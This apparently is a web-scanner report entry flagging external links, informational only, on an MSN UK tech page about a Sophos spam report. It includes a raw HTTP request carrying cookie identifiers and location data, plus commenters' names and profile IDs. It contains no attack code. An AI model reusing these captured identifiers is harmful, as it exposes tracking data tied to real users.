href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&labels=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam." title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&sourceurl=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&description=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam." title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&c=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam." title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&h=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X3F3IwbbQila-ltnM_6bX6QexNUuGaD7J?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-173f68e1861ab75e.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> gordon young ..(ChampMira) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-173f68e1861ab75e.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://byfiles.storage.msn.com/static/16" />...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XR9IfHdLBhb6q52c9o0pPDsr7RSHBMC9m?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XSvp5jen-KEEYNwn_G5Of6cyj03XfQsOQ?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X0iaAXtuYE5N72pVZf0NM1lNXsm75sett?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-7b3b72cc82d94835.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> mike downes ..(mikey baby1944) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-7b3b72cc82d94835.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-pst-body ic-cmt-en">It didn't mention Nigeria because that's where the damn group were staying, in a spam-free residence somewhere in the outback<img src="http://eu.social.s-msn.com/s/images/emoticons/shades_smile.gif" alt="Hot" class="emoticon" /> </div>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X8QsEQ37-rY7FcXcbfIITpyvvQbemsUs4?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xs2axLyYYpTI6GjTVnrDk7703ciyT8nbS?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xv56WTanfviyVV9LAKf_77ADV23HhtScd?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xv56WTanfviyVV9LAKf_77ADV23HhtScd?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... NKS BIG,THE PEOPLE GOT BIG EGOS,BUT HOPING NOT ALL AMERICANS ARE LIKE THAT!! PROBLEM IS MOST YOUNGSTERS APING THEIR BEHAVIOUR,AS IF THEY ARE OUR BETTERS.ALL THIS NEGATIVISM GOT TO GET RID OF.<img src="http://eu.social.s-msn.com/s/images/emoticons/sad_smile.gif" alt="Sad" class="emoticon" />  </div>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xv56WTanfviyVV9LAKf_77ADV23HhtScd?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... </span> FOR TAT!!!<img src="http://eu.social.s-msn.com/s/images/emoticons/teeth_smile.gif" alt="Open-mouthed" class="emoticon" /> </p>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-272a9618db5e76f7.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> stephen connor ..(Honest Charlie) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-272a9618db5e76f7.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X_vnL3RyaX5-ht_-ev5lWhpRY_tWC6M0y?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-pst-body ic-cmt-en"><img src="http://eu.social.s-msn.com/s/images/emoticons/sad_smile.gif" alt="Sad" class="emoticon" />  we're all doomed!!</div>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XpmPNKxYWGeEtG7e7KHpNIzGd9zUto2y4?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XA3b8Uuiy8KOdv0ATMXtfudlQjUTEvce1?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XYcK50lc-1j865GJl4nJKnMxmlOAH9Hg7?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X4ddHjyp7dTuDw2Z3yj93OTDP-KYCtB8z?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... kidding yourselfs that u are not becos u control the press and the geopolitical stage! but watch out china et al are on the rise given time u lots will be cleaning the streets of beijing and lagos lol<img src="http://eu.social.s-msn.com/s/images/emoticons/teeth_smile.gif" alt="Open-mouthed" class="emoticon" /> </div>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-6a467760f2b80189.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> John Heller ..(Aunt Ethel) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-6a467760f2b80189.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://blufiles.storage.msn.com/y1mUj917XjbFuDY0pIQz5XUgL8q8cem5gvI1NjG5SAIoG9C0CPpOP4hWB4Tpy3TF4KKXuGOd3Gp3EK4HgbrBVv4cA" />...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-edd15d6c58b72d56.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> Kevin Hayton ..(HoraceWimp) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-edd15d6c58b72d56.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behaviour. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window"> Code of Conduct</a>...[SNIP]... <li><a href="http://twitter.com/winlivematt"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @winlivematt on Twitter (Twitter)" /></a><a href="http://twitter.com/winlivematt"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/windowslivechannel"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/windowslivechannel"> <strong>...[SNIP]... <li><a href="http://twitter.com/winlivematt"> <img src="http://estb.msn.com/i/85/C1692A652543F43849DE8DC84C787.jpg" width="135" height="81" alt="Follow Matt Farrington-Smith on Twitter" /></a><a href="http://twitter.com/winlivematt"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.9. http://tech.uk.msn.com/microsoft/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/photos.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://cid-173f68e1861ab75e.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-272a9618db5e76f7.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-6a467760f2b80189.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-7b3b72cc82d94835.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://cid-edd15d6c58b72d56.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://digg.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 http://eu.social.s-msn.com/s/images/bluemannxl.png http://eu.social.s-msn.com/s/images/emoticons/sad_smile.gif http://eu.social.s-msn.com/s/images/emoticons/shades_smile.gif http://eu.social.s-msn.com/s/images/emoticons/teeth_smile.gif http://go.microsoft.com/fwlink/?LinkId=74170 http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc http://mail.live.com/ http://mail.live.com/?mkt=en-gb http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaldev.112.2o7.net/b/ss/msnportaldev/1/H.1--NS/0 http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&sourceurl=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&description=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam. http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 http://twitter.com/share http://twitter.com/winlivematt http://www.bing.com/maps/ http://www.bing.com/search?q=Anonymous+deny+PSN+theft&form=TECHTI http://www.bing.com/search?q=Creative+Zen+M300+PMP+iPod+Nano+rival&form=TECHTI http://www.bing.com/search?q=Facebook+to+buy+skype&form=TECHTI http://www.bing.com/search?q=iPad+3+to+be+3D%3F&form=TECHTI http://www.bing.com/search?q=paper+thin+smart+phone&form=TECHTI http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.facebook.com/windowslivechannel http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&labels=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam. http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&c=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam. http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&h=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.reddit.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets http://www.technorati.com/faves?add=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376459&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmicrosoft%2Fphotos.aspx%3Fcp-documentid%3D157623778&lc=2057&id=1184
Request
GET /microsoft/photos.aspx?cp-documentid=157623778 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/microsoft/hotmail/%2526oid%253Dhttp%25253A//tech.uk.msn.com/microsoft/photos.aspx%25253Fcp-documentid%25253D157623778%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA28 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:59 GMT ntCoent-Length: 144189 Content-Length: 144189 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376459&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmicrosoft%2Fphotos.aspx%3Fcp-documentid%3D157623778&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/search?q=Anonymous+deny+PSN+theft&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Anonymous denies PlayStation credit card theft</a>...[SNIP]... <li><a href="http://www.bing.com/search?q=Creative+Zen+M300+PMP+iPod+Nano+rival&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Creative Zen release iPod Nano rival</a>...[SNIP]... <li><a href="http://www.bing.com/search?q=Facebook+to+buy+skype&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Facebook in talks to buy Skype?</a>...[SNIP]... <li><a href="http://www.bing.com/search?q=paper+thin+smart+phone&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> Paper thin smart phone developed</a>...[SNIP]... <li class="last"><a href="http://www.bing.com/search?q=iPad+3+to+be+3D%3F&form=TECHTI" onclick="return Msn.Navigation.OpenNew(event, this)"> iPad 3 to be 3D?</a>...[SNIP]... <cite><a href="http://twitter.com/winlivematt"> Matt Farrington-Smith, </a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <p>The good news for those of you using <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://mail.live.com/?mkt=en-gb"> Hotmail</a>, is you're more protected than most, thanks to something called SmartScreen. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://mail.live.com/?mkt=en-gb"> Hotmail</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&labels=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam." title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&sourceurl=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&description=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam." title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets&c=Sophos+has+published+its+latest+report+into+the+worst+12+countries+for+sending+spam." title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img 